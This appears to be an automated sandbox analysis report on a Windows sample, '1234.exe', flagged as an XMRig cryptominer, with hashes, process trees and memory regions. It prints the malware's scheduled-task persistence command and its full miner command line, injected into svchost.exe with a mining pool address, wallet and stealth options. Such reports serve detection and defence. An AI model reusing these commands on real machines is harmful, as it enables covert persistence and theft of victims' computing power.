Analysis
-
max time kernel
131s -
max time network
121s -
platform
windows7_x64 -
resource
win7-en-20211104 -
submitted
06-12-2021 07:10
Static task
static1
Behavioral task
behavioral1
Sample
1234.exe
Resource
win7-en-20211104
General
-
Target
1234.exe
-
Size
2.1MB
-
MD5
8f7758d7ca504da8622fa77de521ac56
-
SHA1
33a94c3a952f75695f57a712074941642f6f948f
-
SHA256
1b3d6b84916fcb6f6075afa29c93dd4f1566b76095d8727b331032bae857b4e3
-
SHA512
a1b1eb3e4a461cfb542e552081f03d31eb2ee9ace2accf67f91f52b775f62743c753bb61941d17d226fba217b4a25fec0015bdcaa8ddc5f0acac0d4e226191d0
Malware Config
Signatures
-
XMRig Miner Payload 12 IoCs
Processes:
resource yara_rule behavioral1/memory/1732-83-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1732-84-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1732-85-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1732-86-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1732-87-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1732-88-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1732-89-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1732-90-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1732-91-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1732-92-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1732-93-0x000000014030F3F8-mapping.dmp xmrig behavioral1/memory/1732-95-0x0000000140000000-0x0000000140786000-memory.dmp xmrig -
Executes dropped EXE 2 IoCs
Processes:
services64.exesihost64.exepid process 976 services64.exe 1700 sihost64.exe -
Loads dropped DLL 4 IoCs
Processes:
cmd.execonhost.exepid process 804 cmd.exe 804 cmd.exe 1536 conhost.exe 1536 conhost.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
conhost.exedescription pid process target process PID 1536 set thread context of 1732 1536 conhost.exe svchost.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
conhost.execonhost.exepid process 784 conhost.exe 1536 conhost.exe 1536 conhost.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
conhost.execonhost.exedescription pid process Token: SeDebugPrivilege 784 conhost.exe Token: SeDebugPrivilege 1536 conhost.exe -
Suspicious use of WriteProcessMemory 43 IoCs
Processes:
1234.execonhost.execmd.execmd.exeservices64.execonhost.exesihost64.exedescription pid process target process PID 1592 wrote to memory of 784 1592 1234.exe conhost.exe PID 1592 wrote to memory of 784 1592 1234.exe conhost.exe PID 1592 wrote to memory of 784 1592 1234.exe conhost.exe PID 1592 wrote to memory of 784 1592 1234.exe conhost.exe PID 784 wrote to memory of 1932 784 conhost.exe cmd.exe PID 784 wrote to memory of 1932 784 conhost.exe cmd.exe PID 784 wrote to memory of 1932 784 conhost.exe cmd.exe PID 1932 wrote to memory of 1160 1932 cmd.exe schtasks.exe PID 1932 wrote to memory of 1160 1932 cmd.exe schtasks.exe PID 1932 wrote to memory of 1160 1932 cmd.exe schtasks.exe PID 784 wrote to memory of 804 784 conhost.exe cmd.exe PID 784 wrote to memory of 804 784 conhost.exe cmd.exe PID 784 wrote to memory of 804 784 conhost.exe cmd.exe PID 804 wrote to memory of 976 804 cmd.exe services64.exe PID 804 wrote to memory of 976 804 cmd.exe services64.exe PID 804 wrote to memory of 976 804 cmd.exe services64.exe PID 976 wrote to memory of 1536 976 services64.exe conhost.exe PID 976 wrote to memory of 1536 976 services64.exe conhost.exe PID 976 wrote to memory of 1536 976 services64.exe conhost.exe PID 976 wrote to memory of 1536 976 services64.exe conhost.exe PID 1536 wrote to memory of 1700 1536 conhost.exe sihost64.exe PID 1536 wrote to memory of 1700 1536 conhost.exe sihost64.exe PID 1536 wrote to memory of 1700 1536 conhost.exe sihost64.exe PID 1536 wrote to memory of 1732 1536 conhost.exe svchost.exe PID 1536 wrote to memory of 1732 1536 conhost.exe svchost.exe PID 1536 wrote to memory of 1732 1536 conhost.exe svchost.exe PID 1536 wrote to memory of 1732 1536 conhost.exe svchost.exe PID 1536 wrote to memory of 1732 1536 conhost.exe svchost.exe PID 1536 wrote to memory of 1732 1536 conhost.exe svchost.exe PID 1536 wrote to memory of 1732 1536 conhost.exe svchost.exe PID 1536 wrote to memory of 1732 1536 conhost.exe svchost.exe PID 1536 wrote to memory of 1732 1536 conhost.exe svchost.exe PID 1536 wrote to memory of 1732 1536 conhost.exe svchost.exe PID 1536 wrote to memory of 1732 1536 conhost.exe svchost.exe PID 1536 wrote to memory of 1732 1536 conhost.exe svchost.exe PID 1536 wrote to memory of 1732 1536 conhost.exe svchost.exe PID 1536 wrote to memory of 1732 1536 conhost.exe svchost.exe PID 1536 wrote to memory of 1732 1536 conhost.exe svchost.exe PID 1536 wrote to memory of 1732 1536 conhost.exe svchost.exe PID 1700 wrote to memory of 1880 1700 sihost64.exe conhost.exe PID 1700 wrote to memory of 1880 1700 sihost64.exe conhost.exe PID 1700 wrote to memory of 1880 1700 sihost64.exe conhost.exe PID 1700 wrote to memory of 1880 1700 sihost64.exe conhost.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\1234.exe"C:\Users\Admin\AppData\Local\Temp\1234.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\1234.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\services64.exe"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\services64.exe"4⤵
- Creates scheduled task(s)
-
C:\Windows\System32\cmd.exe"cmd" cmd /c "C:\Users\Admin\services64.exe"3⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\services64.exeC:\Users\Admin\services64.exe4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\services64.exe"5⤵
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"6⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "/sihost64"7⤵
-
C:\Windows\System32\svchost.exeC:\Windows/System32\svchost.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=https://pool.hashvault.pro:80 --user=47mixi7RkAmR8pVCzjuTCzVLg6GDsYJGpCEZQ4fDgwfVMBZB4djECiyDZEX6vLmQ4p3KNLUUdiNtaECKeZ9Sb6EvGRJCt7s --pass= --cpu-max-threads-hint=20 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=1 --cinit-idle-cpu=100 --tls --cinit-stealth6⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exeMD5
6f47627be7e8a255543a4f2be8003f83
SHA1fc5fb148155738d8224103c15a8ef66569be1e10
SHA256cc13f86d660cb263609033c46236071fc1eff3c8d78a788c169575185e078f9c
SHA51222cb515e923bdf43d6fcd36dabce036ca981f34282e7b888f09a51ea124af10451559b19ee7515847653d7180a713307d6a69b48450aab796174c7437e036d62
-
C:\Users\Admin\services64.exeMD5
8f7758d7ca504da8622fa77de521ac56
SHA133a94c3a952f75695f57a712074941642f6f948f
SHA2561b3d6b84916fcb6f6075afa29c93dd4f1566b76095d8727b331032bae857b4e3
SHA512a1b1eb3e4a461cfb542e552081f03d31eb2ee9ace2accf67f91f52b775f62743c753bb61941d17d226fba217b4a25fec0015bdcaa8ddc5f0acac0d4e226191d0
-
C:\Users\Admin\services64.exeMD5
8f7758d7ca504da8622fa77de521ac56
SHA133a94c3a952f75695f57a712074941642f6f948f
SHA2561b3d6b84916fcb6f6075afa29c93dd4f1566b76095d8727b331032bae857b4e3
SHA512a1b1eb3e4a461cfb542e552081f03d31eb2ee9ace2accf67f91f52b775f62743c753bb61941d17d226fba217b4a25fec0015bdcaa8ddc5f0acac0d4e226191d0
-
\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exeMD5
6f47627be7e8a255543a4f2be8003f83
SHA1fc5fb148155738d8224103c15a8ef66569be1e10
SHA256cc13f86d660cb263609033c46236071fc1eff3c8d78a788c169575185e078f9c
SHA51222cb515e923bdf43d6fcd36dabce036ca981f34282e7b888f09a51ea124af10451559b19ee7515847653d7180a713307d6a69b48450aab796174c7437e036d62
-
\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exeMD5
6f47627be7e8a255543a4f2be8003f83
SHA1fc5fb148155738d8224103c15a8ef66569be1e10
SHA256cc13f86d660cb263609033c46236071fc1eff3c8d78a788c169575185e078f9c
SHA51222cb515e923bdf43d6fcd36dabce036ca981f34282e7b888f09a51ea124af10451559b19ee7515847653d7180a713307d6a69b48450aab796174c7437e036d62
-
\Users\Admin\services64.exeMD5
8f7758d7ca504da8622fa77de521ac56
SHA133a94c3a952f75695f57a712074941642f6f948f
SHA2561b3d6b84916fcb6f6075afa29c93dd4f1566b76095d8727b331032bae857b4e3
SHA512a1b1eb3e4a461cfb542e552081f03d31eb2ee9ace2accf67f91f52b775f62743c753bb61941d17d226fba217b4a25fec0015bdcaa8ddc5f0acac0d4e226191d0
-
\Users\Admin\services64.exeMD5
8f7758d7ca504da8622fa77de521ac56
SHA133a94c3a952f75695f57a712074941642f6f948f
SHA2561b3d6b84916fcb6f6075afa29c93dd4f1566b76095d8727b331032bae857b4e3
SHA512a1b1eb3e4a461cfb542e552081f03d31eb2ee9ace2accf67f91f52b775f62743c753bb61941d17d226fba217b4a25fec0015bdcaa8ddc5f0acac0d4e226191d0
-
memory/784-63-0x000000001B2B7000-0x000000001B2B8000-memory.dmpFilesize
4KB
-
memory/784-55-0x00000000001F0000-0x0000000000410000-memory.dmpFilesize
2.1MB
-
memory/784-59-0x000000001B2B2000-0x000000001B2B4000-memory.dmpFilesize
8KB
-
memory/784-61-0x000000001B2B6000-0x000000001B2B7000-memory.dmpFilesize
4KB
-
memory/784-60-0x000000001B2B4000-0x000000001B2B6000-memory.dmpFilesize
8KB
-
memory/784-56-0x000000001B550000-0x000000001B76C000-memory.dmpFilesize
2.1MB
-
memory/804-64-0x0000000000000000-mapping.dmp
-
memory/976-68-0x0000000000000000-mapping.dmp
-
memory/1160-62-0x0000000000000000-mapping.dmp
-
memory/1536-73-0x000000001B174000-0x000000001B176000-memory.dmpFilesize
8KB
-
memory/1536-75-0x000000001B177000-0x000000001B178000-memory.dmpFilesize
4KB
-
memory/1536-74-0x000000001B176000-0x000000001B177000-memory.dmpFilesize
4KB
-
memory/1536-72-0x000000001B172000-0x000000001B174000-memory.dmpFilesize
8KB
-
memory/1700-78-0x0000000000000000-mapping.dmp
-
memory/1732-80-0x0000000140000000-0x0000000140786000-memory.dmpFilesize
7.5MB
-
memory/1732-90-0x0000000140000000-0x0000000140786000-memory.dmpFilesize
7.5MB
-
memory/1732-81-0x0000000140000000-0x0000000140786000-memory.dmpFilesize
7.5MB
-
memory/1732-82-0x0000000140000000-0x0000000140786000-memory.dmpFilesize
7.5MB
-
memory/1732-83-0x0000000140000000-0x0000000140786000-memory.dmpFilesize
7.5MB
-
memory/1732-84-0x0000000140000000-0x0000000140786000-memory.dmpFilesize
7.5MB
-
memory/1732-85-0x0000000140000000-0x0000000140786000-memory.dmpFilesize
7.5MB
-
memory/1732-86-0x0000000140000000-0x0000000140786000-memory.dmpFilesize
7.5MB
-
memory/1732-87-0x0000000140000000-0x0000000140786000-memory.dmpFilesize
7.5MB
-
memory/1732-88-0x0000000140000000-0x0000000140786000-memory.dmpFilesize
7.5MB
-
memory/1732-89-0x0000000140000000-0x0000000140786000-memory.dmpFilesize
7.5MB
-
memory/1732-95-0x0000000140000000-0x0000000140786000-memory.dmpFilesize
7.5MB
-
memory/1732-91-0x0000000140000000-0x0000000140786000-memory.dmpFilesize
7.5MB
-
memory/1732-92-0x0000000140000000-0x0000000140786000-memory.dmpFilesize
7.5MB
-
memory/1732-93-0x000000014030F3F8-mapping.dmp
-
memory/1732-94-0x00000000000E0000-0x0000000000100000-memory.dmpFilesize
128KB
-
memory/1880-96-0x0000000001C80000-0x0000000001C82000-memory.dmpFilesize
8KB
-
memory/1880-99-0x0000000001F82000-0x0000000001F84000-memory.dmpFilesize
8KB
-
memory/1880-98-0x0000000000060000-0x0000000000066000-memory.dmpFilesize
24KB
-
memory/1880-101-0x0000000001F86000-0x0000000001F87000-memory.dmpFilesize
4KB
-
memory/1880-100-0x0000000001F84000-0x0000000001F86000-memory.dmpFilesize
8KB
-
memory/1880-102-0x0000000001F87000-0x0000000001F88000-memory.dmpFilesize
4KB
-
memory/1932-58-0x0000000000000000-mapping.dmp